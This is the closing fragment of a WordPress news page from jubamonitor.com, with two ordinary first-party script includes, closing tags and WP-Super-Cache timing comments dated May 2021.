<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/js/theme-script.js?ver=2.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/wp-embed.min.js?ver=5.1.9'></script>
</body>
</html>
<!-- Dynamic page generated in 0.369 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2021-05-03 12:49:21 -->

<!-- super cache -->